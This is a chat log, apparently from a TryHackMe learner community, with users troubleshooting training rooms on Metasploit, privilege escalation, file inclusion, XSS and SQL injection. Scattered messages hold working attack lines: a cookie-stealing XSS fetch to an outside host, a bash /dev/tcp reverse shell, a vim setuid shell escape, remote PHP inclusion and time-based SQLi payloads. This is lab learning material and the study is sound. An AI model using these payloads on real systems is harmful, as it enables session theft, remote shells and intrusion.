Hi I'm having a trouble with the Metasploit:Exploitation MSFVENOM part, i crafted a linux/x86/meterpreter/reverse_tcp elf and used multi/handler to listen, but every time i use the post /linux/gather/hashdump to collect hashes the exploit crashes and the post exploitation module doesn't work, any hint on what can be going wrong?
(Also tried with other post exploitation modules like shell_to_meterpreter and doesn't work either)
@wheat wigeon You are on the right track. What error message do you get. If any?
Well in the victim machine I get Segmentation fault (core dumped), and it suddenly closes the connection to the attacker machine, where I also get a message in Metasploit:
[!] SESSION may not be compatible with this module.
[*] {VICTIM_IP} - Command shell session 1 closed.
[-] Post failed: NameError undefined local variable or method `whoami' for #<Msf::Modules::Post__Linux__Gather__Hashdump::MetasploitModule:0x000055dd74616348>
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/msf/core/post/linux/priv.rb:23:in `is_root?'
[-] /usr/share/metasploit-framework/modules/post/linux/gather/hashdump.rb:25:in `run'
[*] Post module execution completed
(I'm running both machines as root)
When you run the .elf file you get that?
Nope
.elf file works fine
just the post exploitation module linux/gather/hashdump
after running it, it explodes, closing the session
maybe has something to do with the architecture?
Are you having a meterpreter session or a normal shell session?
meterpreter
started listening with the exploit/multi/handler
but now that u mention it, i was never able to execute any command in that session either
If you are using the exploit/multi/handler, have you specified a payload for that listener?
But is the listener payload linux/x86/meterpreter/reverse_tcp ?
It has to be the exact same as the payload you used in msfvenom
yeah noticed it was slightly different
thats probably the issue
let me check
yeah
that was it
thank you, I wouldn't even have realised it was slightly different if it wasn't bc of you
Gave +1 Rep to @shadow echo
ty
Not a problem
in Metasploit: Exploitation I get a fail from the exploit at "Triggering free of corrupted buffer"
show options and post a screenshot please
That LHOST is not correct
The target can only talk to you via your VPN IP, so that's the IP you need
Is that a THM Kali?
no, my vm
Then that IP is wrong for certain
10.10.x.x is for VMs deployed on THM including attackboxes and THM Kalis
yes, now it works
thanks)
I'm kinda a bit stuck and lost, trying to do a bit of research on this but I still don't think I'm grasping it. Working on File Inclusion and stuck on task 5. I'm trying to figure out what it's wanting and doing on the first question, but getting confused reading through everything the task describes
try using
set LHOST tun0
as a network interface. I also tried typing 10.10.x.x.
set LHOST tun0 --> twice
everything is ok now)
thanks
Gave +1 Rep to @ornate yarrow
good to hear.
sometimes setting SMBUser as guest if its open helps when eternalblue crashes
Has anyone been having issues with the Linux Priv Escalation tasks?
Oh, good point. Thanks for sharing.
Gave +1 Rep to @wheat wigeon
I have been attempting Task 6 (sudo) and Task 7 (SUID) rooms. When launching the machine, I will always get a connection error with the machine trying to restart every 15 seconds. I can ssh into the machine via my Attack Box. However, in task 6, I do not see a LD_PRELOAD variable and in task 7 I am not able to nano /etc/shadow. Am I doing something wrong?
Has any genius successfully completed this course yet?
Blue room wasn't that unstable though. But this room is maybe.
Is the Blue room deliberately unstable, you mean, @ornate yarrow?
On Linux right now. Last one is Win.
Np! Also another tip when trying to exploit EternalBlue, OSCP likely: when using the zzz_exploit.py scanner you gotta change the SMBUser = "" to SMBUser = Guest if open, otherwise it will sometimes show as not exploitable
I think so. I tried that room 2 times when I started.
automated exploits are bad practice. everyone should practice manual exploitation
That's super impressive that you peeps are almost done! I am having an educational mental down as there are soo many good courses, and I promised myself not to touch another until I complete those already paid for. This course looks sooo juicy.
Agreed.
Anyone out there having trouble with Task 9 as well?
Cron Jobs aren't running...
try to make them executable
Yes I did. I also ran pspy64.
chmod +x {script_name}
completed 30 seconds ago
I fell on that as well, don't worry about it xD
easy bro. where did you get stuck?
sorry, selected wrong reply.
Thank you buddy. Now it's working!
Gave +1 Rep to @dusky saddle
Hello
Hi, I'm still stuck with the dll task of the Windows Privesc room, can I have some help plz?
I think I have the correct dll, I have stopped/started the dllsvc service. But I don't see Jack's account.. how am I supposed to login? @sterile crescent said yesterday with ||-credential ""||, but still I don't know how to do it.. ^^
yes
how? that what I don't get.
Hi, I'm stuck at Linux PrivEsc Task 9 privilege escalation with Cron Jobs. I'm stuck on the reverse shell, I already edited the file backup.sh for the reverse shell but it didn't work. I am not sure what I missed
hey i'm using the AttackBox.. that's what is going wrong you think?
Thank you. Oh my god what a mistake!
Gave +1 Rep to @steel nymph
Hello everyone. I am having a tough time getting through task 5 of Linux PrivEsc from Jr Pentester.
I have downloaded the exploit code for the vulnerability to the attackbox. It's a .txt file which I have also transferred to the target machine using wget. But how do I run this .txt exploit file?? :/
well what language is the code inside
Anyone provide me with a hint in obtaining the hash of Frank's password in Task 6 (sudo)?
ah crap. I think i got the hint
Thanks @lusty bolt
Gave +1 Rep to @lusty bolt
Ah - I was finally able to get to Karen with the LD_PRELOAD variable
But I did not elevate
Hi everyone , I have a problem with Authentication Bypass Task 2. FFUF does not give me any result.
Apologies - I misspoke.
Does anyone know if we reset the rooms will we get different Tickets or the same ones?
Again no result. I save outputs to the valid_usernames.txt file. "results: []" is empty.
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.116.231/customers/signup -mr "username already exists"
What other binary can be used through its capabilities?
task 8
what is it asking ?
I do that with -o valid_usernames.txt
okay so it's code written in C. Downloaded the exploit to the attackbox, transferred the file to the target machine via wget, moved it to a directory like /tmp. To run the code, I used the command "./filename.c" but get permission denied
in Attackbox
use gcc
It creates the file, writes outputs and in that file I see "results": []; it is empty. Other things are like "stop_errors": false, "stop_403": false.
Thanks, I had tried that previously, but I guess I didn't format it right on that side.
Gave +1 Rep to @steel nymph
to compile it. right!
yes
I did both as you say, but the problem continued for me. I am going to try again, as you say...
Thanks again!
Gave +1 Rep to @lusty bolt
..
any one can help me with this ?
that's what I am asking, I am unable to understand what the question is saying
Hey, on task 8 File Inclusion, Gain RCE - Can I get execution via curl or do I have to set up a listener and search for an exploit?
@cosmic quest Are you getting any results in your terminal windows without adding a > or -o option to your command?
With an http.server for ex?
anyone here completed Windows privilege escalation?
hey, what's the exact end time of the giveaway on the Jr Penetration Tester path???
Thanks @steel nymph! But I'm not able to connect via RDP either..
Gave +1 Rep to @steel nymph
Did you connect from the VM with xrdp?
@steel nymph can i dm you?
Sorry for the late reply, my problem has been solved now. I had to restart my PC and all rooms.
Thanks @steel nymph @modest arch
Gave +1 Rep to @steel nymph
??
you're calling scp correctly but you're not telling it where to download the file
oh no how do I add that
so it's hitting the dir, seeing there's data there, but you need to specify where to put it.
"scp pentester@<IP>:/home/pentester* ."
just redo the command and add a period
k
period is synonymous with <current directory>, you can specify different endpoints by replacing it.
so "scp pentester@<IP>:/home/pentester* ~/Downloads" would put it in your home Downloads folder without you having to actually cd into the dir
thanks @steel nymph
Gave +1 Rep to @steel nymph
Thanks @wanton jolt
Gave +1 Rep to @wanton jolt
Does someone know why I get in every room the same tickets?
Well, if it's all OSCP tickets it should be fine
Pentester title and 1 Day streak freeze
Well I would say it's bad luck :/
@steel nymph hi, can you help me with something? on xss the last part is not working with the decoded version and I don't know why
What is the value of the staff-session cookie?
tried with echo and web-based..
Can you please help me with this task? I'm facing a problem in it.
Thanks for your response. It means a lot to me.
Gave +1 Rep to @steel nymph
</textarea><script>fetch('http://ip?cookie=' + btoa(document.cookie) );</script>
in linprivesc task 8, I try to run ||vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh/", "sh", "-c", "reset; exec sh")'||, but I get a permission denied error
isn't that command supposed to work?
SQL injection task 5, after this line my error should have been gone, what am i missing?
Gave +1 Rep to @steel nymph
oh, now I get this error
@steel nymph Can I DM you?
so did you guys get tickets for each room you completed for this or just certain ones? I did most of these rooms before the path was created and only got tickets for the ones I didn't already complete
in the FAQ it's said that u can cancel ur progress and do it again for the sake of tickets
oh lol, screw the tickets then. I'm definitely not going through them all again
hahaha
thanks @deft valley
welcome
i've been waiting two minutes now and I still haven't got the reverse shell from the crontab
in linprivesc
The command "sc stop ddlsvc & sc start ddlsvc" doesn't work for me.. it says "ControlService FAILED 1052". Do you have an idea why? (I'm still on Windows Privesc..!)
what? so just try ./script.sh
u can try task manager
I'm using ||bash -i >& /dev/tcp/tun0/7777 0>&1||
Thank you @steel nymph
Gave +1 Rep to @steel nymph
then check the directory and, as lassi said, if it's X
I tried to kill dllhijackservice through the task manager but I get access denied..
thanks
Gave +1 Rep to @deft valley
got it thanks
u can ||stop or start, my command with sc start/stop didn't work either, but i used task manager to start it||
anyone able to help with File Inclusion: Task 4, LFI step 1? When I input what I believe to be the answer it tells me it is wrong with the error "Uh-oh! undefined". Not sure if I'm missing something here.
Do you use bitdefender?
What I thought and I tried it in two different browsers. Yes, is it catching the submission and blocking it?
When I try to stop I get the error message "Unable to stop the service. // The requested control is not valid for this service"
try restart then
yeah I will! though that's likely to be the tenth time I restart (not kidding ^^)
can I get a hint or some help with file inclusion task 8, the first challenge? I'm trying to send a POST request with curl, maybe I'm formatting the curl wrong, but I can't seem to find flag1
outputted my ffuf results into customers.txt, any idea why it is displayed like this once i open that file?
anyone manage to get the good cookie for the last part in XSS? I can't manage to get the good one
I'm trying to compile with gcc for linprivesc task 10, but ...
What do I do
I don't really know if what I'm doing is even right
u compile from ur machine
Can you try to stop and start the service in the services.msc gui?
attack machine
oh yeah that would make sense 
So I've restarted, but I'm getting the same pb. With the cmd prompt "sc stop dllsvc" doesn't work, and with task manager I'm still getting "access denied" when I click end task (and I don't see a start/stop button)
did u go to task manager/services/dllsvc?
Yes, and then I get the error message "unable to stop service"
Just checking, have you started the correct machine for this task?
idk then
Yes, the machine name is "DLL_Hijack"
Eyooo
File Inclusion help please - Gain RCE :-
||Started http.server on 1234.
Made PHP file - cmd.txt
Injected malicious URL - http://10.10.155.108/playground.php?file=http://10.10.1.28:1234/cmd.txt
I've tried -
<?PHP shell_exec('hostname'); ?>
and
<?PHP echo gethostname(); ?>||
I'm getting a 200 response but I'm not getting the hostname in the browser.
Is my PHP snippet incorrect?
the file is downloaded from your server?
I don't remember the task but not sure the result is displayed
is that your tun0 ip
might wanna remove that
It feels great to get tickets for completing rooms on the new Jr Pentester path, especially when they complete 3 of the same. Two more prizes won
anyone know
From the attackbox? Why?
oh attackbox is fine
you don't see the start button? on the service ?
Can you terminate and restart the vm?
is this code right? || #include <unistd.h>
#include <stdlib.h>
int main(void)
{ setuid(0);
setgid(0);
system("thm");
return 0;
}||
then I have this in the thm file ||cat /home/matt/flag6.txt||
Yea it has. That's what I thought but I don't know where it would.. that's even if I'm using the right php function
@steel nymph do you know how to help
you're good at this
unlike me
ik but I don't really understand this at all
||/var/www/html??||
I don't know if it's just me but I'm having some real issues with the request time on the Time Based Blind SQLi - it's so hit and miss whether the Request time will populate with the sleep time.
EDIT: Anyone that has problems with this: the example 'u%';-- is not the first character of the database name, try other letters and it will work.
can any1 help me with the path for flag1.txt in linux privesc final task please
ya
Format error. I fixed it n all goooood
but i want to know the actual method
Gave +1 Rep to @steel nymph
Thanks @steel nymph, nice one for helping today
SQL Injection Task 8: Stuck here: https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.tables WHERE table_schema = '{what_i_find}' and table_name like 'z%';--
any hints for me?
got stuck on table_name...
okay, let me cross check....
just finished this pathway! HOLY COW i learned alot
I cross checked, it has a multiple number of a single character....
unfortunately didnt get any of the tickets i wanted XD
do I need to check other characters like ^ ( etc?
how can I add spoiler with my post?
|| both sides
i got different, but that is also wrong(
i admire ur patience, haha
so we must somehow change _ to other symbol ?
or send smth like "\__"
now I know thanks @steel nymph let me try again
oh, nice, seems i have a correct db name now)
thanks
i checked with database() = 'name' and it returned "true"
but when i try admin123' UNION SELECT SLEEP(5),2 WHERE table_schema = 'name' and table_name like'%';-- get "false"
it makes me crazy(
|| sqli_four% and sqli_four || both are giving me 5 sec, what does it mean? should I dig more?
thank you!
Gave +1 Rep to @steel nymph
but i just copied query from previous task
maybe add a from statement, i am not sure, just did it but forgot
Did you manage to finish Task 10 ?
yep
Nice job
haha, that's a really good idea
thanks)
Gave +1 Rep to @twilit yoke
my first rep
hmm, _ is last in array of chars
but when i get answer half of letters are changed by _
strange things
hey guys, can i have a hint for lfi challenge 1? i've tried changing to the POST method using curl, dev-tools or burp while trying a lot of queries but without success...
I actually don't get what I'm doing wrong ||admin123' UNION SELECT SLEEP(2),2 FROM information_schema.tables where table_schema = 'sqli_four' AND table_name = 'users' AND column_name like '%[]%';--||
How can I bypass an LFI filter that is filtering /
I tried to url encode but didn't work.
Same here.
I tried all the symbols and none of them worked
check, after ||schema||, it should be another word
that's what i understood from the link
By running the queries below you will see the difference between using other wildcard characters in the LIKE clause enclosed in the brackets and without (in the last query it is not necessary to include '[' in the brackets):
USE TestDB
GO
-- %
SELECT *
FROM myUser
WHERE LoginName LIKE '%%%'
SELECT *
FROM myUser
WHERE LoginName LIKE '%[%]%'
-- [
SELECT *
FROM myUser
WHERE LoginName LIKE '%[%'
SELECT *
FROM myUser
WHERE LoginName LIKE '%[[]%'
-- ]
SELECT *
FROM myUser
WHERE LoginName LIKE '%]%'
you're not wrong @steel nymph
The Linux PrivEsc room was simply amazing. It has helped me refresh a ton of privesc methods.
For anyone interested, kernel exploits can also be found in the Metasploit Framework. You just need to create an ssh session inside the MSF (using the appropriate module and the credentials that have been provided to you) and simply run the exploit.
THANK YOU SO MUCH FOR THIS TIP, i was able to solve it
Gave +1 Rep to @deft valley
thanks everyone
no problem, be attentive
for sure, next time will be
thanks)
Gave +1 Rep to @deft valley
sleep(5) does it mean superextratrue?
||admin123' UNION SELECT SLEEP(5),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_four' and TABLE_NAME='analytics_referrers' and COLUMN_NAME like 'id' and COLUMN_NAME !='domain';|| how could I find more column?
hi is there anybody who has done xss room?
i've tried putting the query in the body and still nothing, i don't know what i'm missing, thx for the answer though
Gave +1 Rep to @steel nymph
What is the value of the staff-session cookie?
i need help with this question
restart which box?
it's a base64
I'm on the XSS as well